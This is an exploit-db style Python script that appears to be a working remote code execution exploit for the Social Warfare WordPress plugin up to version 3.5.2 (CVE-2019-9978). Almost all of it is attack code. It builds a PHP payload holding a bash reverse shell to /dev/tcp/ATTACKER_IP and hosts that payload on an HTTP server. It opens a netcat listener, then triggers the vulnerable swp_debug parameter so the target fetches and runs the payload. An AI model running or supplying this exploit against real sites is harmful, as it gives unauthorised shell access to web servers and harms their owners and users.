📄 WordPress Social Welfare 3.5.2 Remote Code Execution

#!/usr/bin/env python3
    
    # Exploit Title: Social Warfare WordPress Plugin 3.5.2 - Remote Code Execution (RCE)
    # Date: 25-06-2025
    # Exploit Author: Huseyin Mardini (@housma)
    # Original Researcher: Luka Sikic
    # Original Exploit Author: hash3liZer
    # Vendor Homepage: https://wordpress.org/plugins/social-warfare/
    # Software Link: https://downloads.wordpress.org/plugin/social-warfare.3.5.2.zip
    # Version: <= 3.5.2
    # CVE: CVE-2019-9978
    # Tested On: WordPress 5.1.1 with Social Warfare 3.5.2 (on Ubuntu 20.04)
    # Python Version: Python 3.x
    # Reference: https://www.exploit-db.com/exploits/46794
    # Github (original PoC): https://github.com/hash3liZer/CVE-2019-9978
    
    # The currently listed exploit for *CVE-2019-9978* (Exploit ID 46794<https://www.exploit-db.com/exploits/46794>) appears to no longer work as intended in many modern environments
    
    # Usage:
    #   1. Edit the config section below and replace `ATTACKER_IP` with your machine's IP.
    #   2. Run the script: `python3 exploit.py`
    #   3. It will:
    #       - Create a PHP payload and save it as `payload.txt` (or any filename you set in PAYLOAD_FILE)
    #       - Start an HTTP server on `HTTP_PORT` to host the payload
    #       - Start a Netcat listener on `LISTEN_PORT`
    #       - Trigger the vulnerability via the vulnerable `swp_debug` parameter
    #   4. On success, you get a reverse shell as `www-data`.
    #
    # Note:
    #   - PAYLOAD_FILE defines only the name of the file to be created and served.
    #   - Make sure ports 8001 and 4444 are open and not in use.
    
    import requests
    import threading
    import http.server
    import socketserver
    import os
    import subprocess
    import time
    
    # --- Config ---
    TARGET_URL = "http://example.com"
    ATTACKER_IP = "xxx.xxx.xx.xx"  # Change to your attack box IP
    HTTP_PORT = 8000
    LISTEN_PORT = 4444
    PAYLOAD_FILE = "payload.txt"
    
    
    def create_payload():
        """Write exact reverse shell payload using valid PHP syntax"""
        payload = f'<pre>system("bash -c \\"bash -i >& /dev/tcp/{ATTACKER_IP}/{LISTEN_PORT} 0>&1\\"")</pre>'
        with open(PAYLOAD_FILE, "w") as f:
            f.write(payload)
        print(f"[+] Payload written to {PAYLOAD_FILE}")
    
    
    def start_http_server():
        """Serve payload over HTTP"""
        handler = http.server.SimpleHTTPRequestHandler
        with socketserver.TCPServer(("", HTTP_PORT), handler) as httpd:
            print(f"[+] HTTP server running at port {HTTP_PORT}")
            httpd.serve_forever()
    
    
    def start_listener():
        """Start Netcat listener"""
        print(f"[+] Listening on port {LISTEN_PORT} for reverse shell...")
        subprocess.call(["nc", "-lvnp", str(LISTEN_PORT)])
    
    
    def send_exploit():
        """Trigger the exploit with vulnerable parameter"""
        payload_url = f"http://{ATTACKER_IP}:{HTTP_PORT}/{PAYLOAD_FILE}"
        exploit = f"{TARGET_URL}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={payload_url}"
        print(f"[+] Sending exploit: {exploit}")
        try:
            requests.get(exploit, timeout=5)
        except requests.exceptions.RequestException:
            pass
    
    
    def main():
        create_payload()
    
        # Start web server in background
        http_thread = threading.Thread(target=start_http_server, daemon=True)
        http_thread.start()
        time.sleep(2)  # Give server time to start
    
        # Start listener in background
        listener_thread = threading.Thread(target=start_listener)
        listener_thread.start()
        time.sleep(1)
    
        # Send the malicious request
        send_exploit()
    
    
    if __name__ == "__main__":
        try:
            main()
        except KeyboardInterrupt:
            print("[-] Interrupted by user.")